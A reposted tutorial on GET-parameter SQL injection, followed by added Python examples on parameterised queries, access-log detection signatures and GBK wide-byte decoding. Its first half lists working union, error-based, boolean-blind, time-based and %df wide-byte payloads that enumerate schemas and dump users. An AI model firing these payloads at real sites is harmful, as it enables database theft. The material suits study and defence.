GET-type SQL Injection Basics (2)
程序员文章站
2022-05-15 11:51:37
Identifying the injection point (worked examples)
Integer type
?id=1 //starting page
?id=1 and 1=1 page displays normally
?id=1 and 1=2 page displays abnormally
String type
?id=1 //starting page
?id=1" and 1=1 --+ page displays normally
?id=1" and 1=2 --+ page displays abnormally //the closing may be ' " ') ") ')) etc.
Example:
?id=71 //page displays normally
?id=71' //page abnormal
?id=71'--+ //page back to normal, meaning SQL injection exists and the closing is a single quote
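As an added example (not code from the original post), the following Python script shows why the three probes above separate an injectable parameter from a safe one, and what the fix looks like. It uses an in-memory SQLite table constructed for the example in place of the site's MySQL database; the table layout, the function names and the id 71 are assumptions.

```python
import sqlite3


def _make_db():
    # Constructed sample data (not from the original post): an in-memory
    # table standing in for the application's own database.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "alice"), (2, "bob"), (71, "carol")])
    return conn


def lookup_vulnerable(conn, user_id):
    # String concatenation: whatever the client sends becomes part of the
    # SQL text, so a quote in the value closes the literal and the rest of
    # the value is parsed as SQL.
    sql = "SELECT username FROM users WHERE id = '" + user_id + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, user_id):
    # Parameterised: the driver sends the value separately from the query
    # text, so quotes and comment markers in it are data, not syntax.
    sql = "SELECT username FROM users WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (user_id,))]


def probe_results(lookup):
    """Run the post's three probes through one lookup function and report
    which of them returned rows. An injectable endpoint gives
    (True, True, False): the real id matches, 'and 1=1' keeps the result
    and 'and 1=2' removes it. A parameterised endpoint gives
    (True, False, False): only the literal value 71 ever matches."""
    conn = _make_db()
    try:
        return tuple(bool(lookup(conn, value)) for value in (
            "71",
            "71' and 1=1 -- ",
            "71' and 1=2 -- ",
        ))
    finally:
        conn.close()


def raises_syntax_error(lookup, user_id):
    """True if the lookup fails with a SQL syntax error for this value.
    This is the 'page abnormal' step: a lone quote breaks the concatenated
    query but is harmless to the parameterised one."""
    conn = _make_db()
    try:
        lookup(conn, user_id)
        return False
    except sqlite3.OperationalError:
        return True
    finally:
        conn.close()


if __name__ == "__main__":
    print("concatenated :", probe_results(lookup_vulnerable),
          "quote breaks query:", raises_syntax_error(lookup_vulnerable, "71'"))
    print("parameterised:", probe_results(lookup_safe),
          "quote breaks query:", raises_syntax_error(lookup_safe, "71'"))
```

The same three-request pattern (original value, `and 1=1`, `and 1=2`) is what a detection rule should key on: two near-identical requests whose only difference is a tautology versus a contradiction.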
Injection types
Union query (has a display position)
Determine the column count: order by 6 --+ //assume there are 6
Determine the display position: union select 1,2,3,4,5,6 --+ //assume it is column 2
union select 1,database(),3,4,5,6 --+ //assume the database is security
union select 1,(select group_concat(table_name) from INFORMATION_schema.tables where table_schema='security'),3,4,5,6 --+ //learn the table name user
union select 1,(select group_concat(column_name) from INFORMATION_SCHEMA.columns where table_name='user' and table_schema='security'),3,4,5,6 --+
union select 1,(select group_concat(username) from user),3,4,5,6 --+ dumps the contents
Error-based injection (no display position, but SQL execution error messages are shown)
and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)
Boolean-based blind injection (page responses differ)
length(database())=9
178 and ascii(substr(database(),1,1))=109 m
178 and ascii(substr(database(),2,1))=121 y
178 and ascii(substr(database(),3,1))=51 3
178 and ascii(substr(database(),4,1))=48 0
178 and ascii(substr(database(),5,1))=48 0
178 and ascii(substr(database(),6,1))=54 6
178 and ascii(substr(database(),7,1))=56 8
178 and ascii(substr(database(),8,1))=56 8
178 and ascii(substr(database(),9,1))=56 8
Database name: my3006888
178 and (select length(table_name) from information_schema.tables where table_schema='my3006888' limit 0,1)=5
The first table in my3006888 has a name of length 5
178 and (select ascii(substr((select table_name from information_schema.tables where table_schema='my3006888' limit 0,1),1,1)))=97 a
178 and (select ascii(substr((select table_name from information_schema.tables where table_schema='my3006888' limit 0,1),2,1)))=100 d
178 and (select ascii(substr((select table_name from information_schema.tables where table_schema='my3006888' limit 0,1),3,1)))=109 m
178 and (select ascii(substr((select table_name from information_schema.tables where table_schema='my3006888' limit 0,1),4,1)))=105 i
178 and (select ascii(substr((select table_name from information_schema.tables where table_schema='my3006888' limit 0,1),5,1)))=110 n
The first table name is admin
178 and (select length(column_name) from information_schema.columns where table_schema='my3006888' and table_name='admin' limit 0,1)=2
178 and (select ascii(substr((select column_name from information_schema.columns where table_schema='my3006888' and table_name='admin' limit 0,1),1,1)))=105 i
178 and (select ascii(substr((select column_name from information_schema.columns where table_schema='my3006888' and table_name='admin' limit 0,1),2,1)))=100 d
The first column of the admin table is id
Time-based blind injection (page responses identical, no display position)
and if((length(database())>5),sleep(10),0) //not executed
and if((length(database())=3),sleep(10),0) //executed, meaning the database name length is 3
and if((ascii(substr(database(),1,1))=99),sleep(10),0) //the first letter is c
... and so on, as above
Wide-byte injection (\ escaping with a GBK database)
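From the defender's side, every technique listed above (union, error-based, boolean blind, time-based, and the %df wide-byte marker of the final section) leaves a recognisable trace in the web server's access log. The following Python script is an added example, not code from the original post: it URL-decodes the query string of each GET request, matches the signatures drawn from the probes on this page, and counts hits per client, because blind injection shows up as a long run of near-identical requests from one source. The log format, signature names and sample log lines are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Signatures drawn from the probes listed in the post. They are applied to the
# URL-decoded, lower-cased query string of each GET request.
SIGNATURES = {
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*[12]\b"),
    "order_by":      re.compile(r"\border\s+by\s+\d+"),
    "union_select":  re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema_enum":   re.compile(r"information_schema\.(tables|columns)"),
    "error_based":   re.compile(r"floor\s*\(\s*rand\s*\("),
    "blind_char":    re.compile(r"ascii\s*\(\s*substr\s*\("),
    "time_based":    re.compile(r"\bsleep\s*\(\s*\d+"),
}

# The wide-byte marker is checked on the raw, still-encoded query string: once
# decoded, %df is just an invalid byte and the pattern is lost.
WIDE_BYTE = re.compile(r"%df%27|%df'", re.IGNORECASE)

# Combined-log-format line: client ip, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "GET (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def classify(path):
    """Return the set of signature names that fire for one request path."""
    hits = set()
    query = path.partition("?")[2]
    if WIDE_BYTE.search(query):
        hits.add("wide_byte")
    decoded = unquote_plus(query).lower()
    for name, pattern in SIGNATURES.items():
        if pattern.search(decoded):
            hits.add(name)
    return hits


def scan(lines):
    """Parse access-log lines and return {ip: Counter(signature -> count)} for
    every client that triggered at least one signature."""
    per_ip = {}
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        hits = classify(m.group("path"))
        if hits:
            per_ip.setdefault(m.group("ip"), Counter()).update(hits)
    return per_ip


# Constructed sample log (not a real capture); addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [15/May/2022:11:51:37 +0800] "GET /item.php?id=71 HTTP/1.1" 200 512
203.0.113.5 - - [15/May/2022:11:51:39 +0800] "GET /item.php?id=71%27%20and%201=1%20--+ HTTP/1.1" 200 512
203.0.113.5 - - [15/May/2022:11:51:41 +0800] "GET /item.php?id=71%27%20and%201=2%20--+ HTTP/1.1" 200 311
203.0.113.5 - - [15/May/2022:11:51:45 +0800] "GET /item.php?id=71%27%20order%20by%206%20--+ HTTP/1.1" 200 512
203.0.113.5 - - [15/May/2022:11:51:50 +0800] "GET /item.php?id=-1%27%20union%20select%201,database(),3,4,5,6%20--+ HTTP/1.1" 200 530
203.0.113.5 - - [15/May/2022:11:52:02 +0800] "GET /item.php?id=178%20and%20ascii(substr(database(),1,1))=109 HTTP/1.1" 200 512
203.0.113.5 - - [15/May/2022:11:52:10 +0800] "GET /item.php?id=1%20and%20if((length(database())=3),sleep(10),0) HTTP/1.1" 200 512
198.51.100.7 - - [15/May/2022:11:52:12 +0800] "GET /item.php?id=%df%27%20and%201=1%20--+ HTTP/1.1" 200 512
198.51.100.7 - - [15/May/2022:11:52:20 +0800] "GET /item.php?id=12 HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    for ip, counts in scan(SAMPLE_LOG.splitlines()).items():
        print(ip, dict(counts))
```

Note the ordering inside `classify`: the wide-byte check runs on the raw query string before decoding, while everything else runs after decoding, otherwise `%20`, `+` and the `--+` comment terminator would defeat the plain-text patterns. A response-size column (the last field) is also worth keeping in the parsed record, since the boolean probes on this page are distinguished precisely by the page changing size between `1=1` and `1=2`.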
%df
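As an added illustration (not from the original post) of the mechanism the heading names, the following Python check shows what happens to an escaping backslash when the same bytes are interpreted as GBK versus UTF-8. The input bytes are constructed for the example: the 0xdf byte mentioned above, followed by a backslash-escaped single quote as an escaping function such as PHP's addslashes would produce.

```python
def backslash_survives(raw, charset):
    """Decode an escaped byte sequence the way a database connection using
    the given charset would, and report whether the escaping backslash
    (0x5c) is still present as a character of its own afterwards."""
    text = raw.decode(charset, errors="replace")
    return "\\" in text


def decoded_length(raw, charset):
    """Number of characters the connection sees for the same bytes."""
    return len(raw.decode(charset, errors="replace"))


# Constructed input: 0xdf, then backslash (0x5c) and single quote (0x27),
# i.e. the output of byte-oriented escaping applied to "<0xdf>'".
ESCAPED = b"\xdf\x5c\x27"

if __name__ == "__main__":
    for charset in ("gbk", "utf-8"):
        print(charset,
              "chars:", decoded_length(ESCAPED, charset),
              "backslash kept:", backslash_survives(ESCAPED, charset))
```

Under GBK the lead byte 0xdf swallows the following 0x5c as the second half of a two-byte character, so the quote is no longer escaped; under UTF-8 the 0xdf byte is rejected on its own and the backslash is left intact. The practical consequence is that escaping applied before the connection charset is known cannot protect a GBK connection; the charset has to be set on the connection itself (with a single-byte-safe encoding such as utf8mb4) and the query parameterised.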